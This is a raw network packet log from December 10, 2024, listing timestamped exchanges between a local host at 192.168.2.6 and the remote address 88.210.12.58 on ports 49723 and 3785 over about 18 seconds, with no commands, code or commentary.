Dec 10, 2024 08:59:57.064800978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.081603050 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.164062023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.184124947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.264094114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.283644915 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.365155935 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.383666992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.465214968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.484723091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.568789005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.584800959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.666053057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.688435078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.768785000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.785541058 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.867069960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.888237000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:57.968825102 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:57.986732960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.068120956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.088336945 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.168118954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.187858105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.269088984 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.287739992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.369076014 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.388734102 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.470078945 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.488719940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.570039034 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.589643955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.670087099 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.689613104 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.770154953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.789556026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.871105909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.889663935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:58.971093893 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:58.990628958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.072798967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.090631008 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.172787905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.192368031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.276808023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.292274952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.373060942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.396528959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.473042011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.492743015 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.573103905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.592530966 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.674055099 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.692590952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.776779890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.793589115 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.876796961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.896277905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:59.975078106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:59.996361971 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.077356100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.094795942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.177114964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.196887016 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.278050900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.296679020 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.378087997 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.397583961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.479064941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.497544050 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.580111980 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.598588943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.681082964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.699677944 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.781084061 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.800537109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.882078886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:00.900775909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:00.984879971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.001765013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.084783077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.104414940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.184782028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.204418898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.285072088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.304191113 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.386070013 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.404587984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.487046003 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.505729914 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.587049961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.606570959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.688051939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.706554890 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.789217949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.807704926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.889040947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:01.908694029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:01.990122080 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.008444071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.091170073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.109550953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.192094088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.210722923 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.292082071 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.311717987 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.393167019 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.411839008 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.494054079 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:02.512717009 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:02.613518000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.235075951 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.336064100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.354927063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.436089039 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.455482960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.537107944 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.555655956 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.637070894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.656488895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.737112045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.756491899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.840780020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.856584072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:03.940788031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:03.961672068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.039094925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.060430050 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.139071941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.158579111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.240061998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.259143114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.340101957 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.359536886 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.441308975 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.459500074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.542061090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.560811996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.643102884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.661473989 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.743212938 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.762522936 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.844104052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.862670898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:04.944102049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:04.963604927 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.044790030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.063689947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.144104004 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.164607048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.245049953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.263565063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.345082045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.364566088 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.445514917 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.465455055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.546057940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.566376925 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.651967049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.665540934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.756412029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.771626949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.876055956 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:05.880790949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:05.983237028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.000195026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.102967024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.184077978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.285110950 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.303605080 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.385066032 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.404654026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.486363888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.504503965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.586078882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.606009960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.687063932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.705595016 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.788119078 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.806615114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.888056993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:06.907815933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:06.989116907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.007488012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.092819929 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.108778954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.192785025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.212322950 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.289048910 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.312443972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.392770052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.408768892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.492784023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.512141943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.592777967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.612221003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.691668034 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.712150097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.792066097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.811361074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.892139912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:07.911645889 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:07.992093086 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:08.011665106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.093194008 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:08.111782074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.193157911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:08.212788105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.312726974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.394102097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:08.513639927 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.613749027 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:08.733432055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:08.928091049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.028795004 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.048521996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.129077911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.148411036 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.229187965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.248599052 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.330091000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.348746061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.432799101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.449487925 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.532058001 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.552221060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.636804104 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.651521921 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.734057903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.756298065 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.835083008 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.853533983 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:09.936789036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:09.954520941 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.037122011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.056221962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.138130903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.156593084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.239098072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.257534027 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.340100050 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.358570099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.441133022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.459450960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.542093992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.560538054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.642075062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.661552906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.742048979 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.761558056 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.843116045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.861620903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:10.943274975 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:10.962596893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.044800043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.062774897 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.164458990 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.171730995 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.273210049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.291106939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.393106937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.484966040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.604562044 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.688788891 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.788780928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.808278084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.888791084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:11.908178091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:11.989079952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.008179903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.090092897 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.108830929 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.191047907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.210097075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.292051077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.310606003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.393066883 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.411425114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.493498087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.512418985 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.594082117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.612837076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.694087029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.713522911 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.794055939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.813452005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.895071030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:12.914124012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:12.995069027 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.015433073 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.096868992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.115556002 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.195199013 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.216228962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.296044111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.315403938 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.397058010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.416677952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.497664928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.517314911 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.598057985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.618091106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.702800989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.721539974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.799144983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.822247982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:13.900055885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:13.918565035 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.002887011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.019476891 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.100169897 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.122442961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.201378107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.219525099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.301089048 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.320796967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.402041912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.420641899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.503070116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.521433115 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.603183031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.622426987 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.703185081 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.722515106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.804160118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.822654963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:14.905086994 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:14.923607111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.006082058 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.024471998 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.112797022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:15.125531912 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:15.207077026 CET	49723	3785	192.168.2.6	88.210.12.58
